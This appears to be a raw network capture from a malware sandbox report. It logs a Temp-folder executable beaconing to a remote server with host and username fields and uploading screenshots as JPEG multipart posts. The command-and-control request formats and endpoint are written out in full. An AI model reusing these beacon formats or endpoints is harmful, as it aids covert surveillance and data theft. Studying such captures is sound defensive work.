                                        Aug 29, 2021 22:28:28.378916025 CEST15292OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:28.379004955 CEST15295OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:28.379030943 CEST15305OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:28.379061937 CEST15307OUTData Raw: 1f c3 56 c5 cb 8f 7a 91 6e bd 68 f6 70 7d 43 da 54 46 69 86 41 fc 26 9a 55 87 50 45 6b 7d a5 0f 55 14 be 64 2d d5 45 3f 63 17 b3 0f 6c fa a3 23 14 95 ae 52 dd bb 51 f6 4b 73 d3 8a 9f 62 fa 31 fb 75 d5 19 34 56 a9 d3 e3 3d 1a a3 3a 61 ec c2 97 b1
                                        Data Ascii: Vznhp}CTFiA&UPEk}Ud-E?cl#RQKsb1u4V=:a{hx4e0KIt)TUijco"2;\KFKJp1J2n%-4!ih%8RSP(.($Zp*Si,ZQIJ*--%8SD;H.(&LShG.(>P!FmsG(s
                                        Aug 29, 2021 22:28:28.379070044 CEST15309OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:28.379441023 CEST15312OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:28:28.533855915 CEST15382INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:28 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        235192.168.2.44997446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:28.577480078 CEST15383OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:28.653201103 CEST15383INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:28 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        236192.168.2.44997546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:37.833102942 CEST15384OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:37.910872936 CEST15423INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:37 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        237192.168.2.44997646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:37.851378918 CEST15384OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:37.851492882 CEST15384OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:37.851622105 CEST15395OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:37.851701021 CEST15397OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:37.884488106 CEST15400OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:37.884535074 CEST15403OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:37.884546995 CEST15406OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:37.884953022 CEST15417OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:37.884989977 CEST15420OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:37.885000944 CEST15423OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:28:37.917831898 CEST15426OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:38.020809889 CEST15493INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        238192.168.2.44997746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:38.140650034 CEST15494OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:38.219350100 CEST15494INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        239192.168.2.44997846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:38.485871077 CEST15495OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:38.560132027 CEST15577INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        24192.168.2.44975946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:19.809866905 CEST3607OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6c877eb2a3da7264dec94b69baff2e36
                                        Host: 46.17.96.36
                                        Content-Length: 107432
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:19.809885025 CEST3607OUTData Raw: 2d 2d 2d 2d 2d 2d 36 63 38 37 37 65 62 32 61 33 64 61 37 32 36 34 64 65 63 39 34 62 36 39 62 61 66 66 32 65 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6c877eb2a3da7264dec94b69baff2e36Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:19.809897900 CEST3617OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:19.809917927 CEST3620OUTData Raw: 30 17 34 a0 d3 69 79 a0 07 71 4b 4c a7 03 4c 41 8a 4c 1a 5c d2 d0 21 98 a3 14 fa 31 9a 56 1d c6 62 92 9f b6 82 b4 58 2e 32 96 8d b4 60 d2 18 52 1e b4 b4 53 10 94 b4 50 28 18 51 45 06 81 05 14 aa ac c7 0a a4 9f 40 2a ca 69 d7 92 7d db 77 ff 00 81
                                        Data Ascii: 04iyqKLLAL\!1VbX.2`RSP(QE@*i}w:o`VM>?^)2]U8I+QaEP (JZ()-Q@-I!q3@\gz*iWtVSB?~HjjkvCWS*h9sNPQKE%-.(%w
                                        Aug 29, 2021 22:27:19.849611998 CEST3623OUTData Raw: 8a 8a b6 cd 7e 37 47 5e 66 ab 2a 50 74 77 4f f4 67 57 20 b7 6f 0a b7 da 82 35 b8 b7 0c fb 86 46 00 07 35 8f e2 65 95 7e 15 ea c6 6f f5 ad a6 12 f9 eb 9f 28 03 fa 8a d6 b6 d3 40 f0 a5 a6 9d 7f 18 63 1c 30 a4 a9 9c 82 57 6f 1e e3 22 ab 78 f3 fe 49
                                        Data Ascii: ~7G^f*PtwOgW o5F5e~o(@c0Wo"xI^25s>Ru;Sr/o%[D3$&"xm}?Vh3K+iJm`xsth%\g=A]]=3TTNw\YO.C
                                        Aug 29, 2021 22:27:19.849631071 CEST3628OUTData Raw: 12 b1 43 e4 b6 f7 21 8a 90 ab 8c 9c 32 b0 e3 b8 23 b5 54 29 c6 2e e9 93 29 c9 ab 34 54 a2 ae dc e8 fa 9d 95 e7 d8 ee f4 db cb 7b af 2c cb e4 cb 03 23 ec 00 92 db 48 ce 00 04 e7 d8 fa 55 57 82 68 e3 86 59 22 91 23 99 4b 44 ec a4 07 00 90 4a 9e e3
                                        Data Ascii: C!2#T).)4T{,#HUWhY"#KDJ ;ez~Znu{".KhZB;}t&a%FN_(8Wj.rE@Q]xjK._^Gol>AEj6r]WV$gtBNXiIJ2=KG..
                                        Aug 29, 2021 22:27:19.849642992 CEST3631OUTData Raw: 77 1b 8a 29 68 a4 31 b4 53 b1 46 29 58 63 79 a5 e6 97 14 98 3e b4 58 2e 1c d1 cd 18 a2 8b 05 c4 a5 14 73 47 34 00 52 8a 4a eb 7c 37 f0 ff 00 58 f1 35 bb 4d 65 19 20 00 4e 00 c0 07 a6 49 20 73 e9 59 d4 ab 0a 6a f3 66 f8 7c 2d 5c 43 6a 9a db 57 76
                                        Data Ascii: w)h1SF)Xcy>X.sG4RJ|7X5Me NI sYjf|-\CjWv^5?|O<?Jxu(Gxp6YBK$z*kZuaQ^aQoV8vZt[P5?_hrE
                                        Aug 29, 2021 22:27:19.849817991 CEST3640OUTData Raw: 98 ef e0 64 74 ac 9b 9f 88 ad 67 6b 75 75 36 90 44 09 25 cc 56 cc 2e 39 95 e1 ce 43 0d bf 26 42 92 3e f7 4a e2 f6 29 b6 e7 a9 da f1 f3 84 63 0a 1e e2 5b f9 bf 3f 2f 26 6c e8 5e 1f 9f 4a d4 ae ef 24 96 d9 56 74 0b e4 5a 44 63 8f 23 f8 88 24 e0 fd
                                        Data Ascii: dtgkuu6D%V.9C&B>J)c[?/&l^J$VtZDc#$+<V'-{.x,.|p\W|xpOZABPKyPE.+GKF)@#i%CoR%k3$?kV_[=>1h^Y
                                        Aug 29, 2021 22:27:19.849889994 CEST3645OUTData Raw: 04 67 1b 59 4f d3 72 a9 fc 2b c0 c9 28 3a f8 8a 91 4e ce df aa 3d 0c ce ba a1 4a 12 6a ea ff 00 a3 3d 5d a4 bc 4f 0d f9 d6 8d 1b 5e 79 6a e0 ca 0e d2 dc 67 81 f8 d6 57 8b 2e 16 ef e1 d6 bd 72 9f 76 5b 16 90 7d 0c 40 d5 d4 9e e6 e3 c1 70 cd 69 18
                                        Data Ascii: gYOr+(:N=Jj=]O^yjgW.rv[}@pi7E<)`a[iXO]IM~>Q+8BQE^J/a4ud3I,u<<{~~g93xr;i 2*QZfsbd
                                        Aug 29, 2021 22:27:19.882901907 CEST3651OUTData Raw: 79 92 6b 77 b6 bc f2 36 95 39 c3 7c 8d 90 4e 3a 6d 3d 79 f4 e8 ab 7e 57 ca 61 4e dc da 96 cc 3a 16 99 69 62 fa 9c 7a 9d cc b7 d1 9b 85 16 d2 a4 22 18 37 95 52 43 23 6f 63 b4 9c 02 a0 0c 72 73 c6 f5 9f 83 6c e3 89 fe dd 0e a5 71 1a ea 4f 69 2d fd
                                        Data Ascii: ykw69|N:m=y~WaN:ibz"7RC#ocrslqOi-Z#yAF k~$r@hC!GJdD+c,-4|#hjmBrA\m_-/YcMgsllO8R<P3>o}BZ"K
                                        Aug 29, 2021 22:27:19.882961988 CEST3656OUTData Raw: 8e 94 de f4 e1 54 21 c0 d3 81 a6 52 8a 64 b2 41 4a 29 80 d3 85 51 23 a9 c0 d4 62 9e 0f 15 48 96 3b 34 b9 a6 66 8c f3 4c 56 25 06 9d 51 83 4f 15 48 96 3a 9d 4d 14 66 aa e4 d8 7d 3b 35 10 39 a7 55 5c 9b 0f dd 4a 0d 30 53 d0 53 44 b2 44 14 fe b4 dc
                                        Data Ascii: T!RdAJ)Q#bH;4fLV%QOH:Mf};59U\J0SSDDKTC)d1ShC)4q4asJh@XyzQMObQi<SGOQLhHFqZ?]9u-U&sq8fF((Z(RQHB(Ke-!
                                        Aug 29, 2021 22:27:20.312592030 CEST3715INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        240192.168.2.44997946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:38.488233089 CEST15495OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:38.488346100 CEST15495OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:38.488554955 CEST15505OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:38.488610029 CEST15508OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:38.522614956 CEST15511OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:38.522670984 CEST15514OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:38.522686958 CEST15519OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
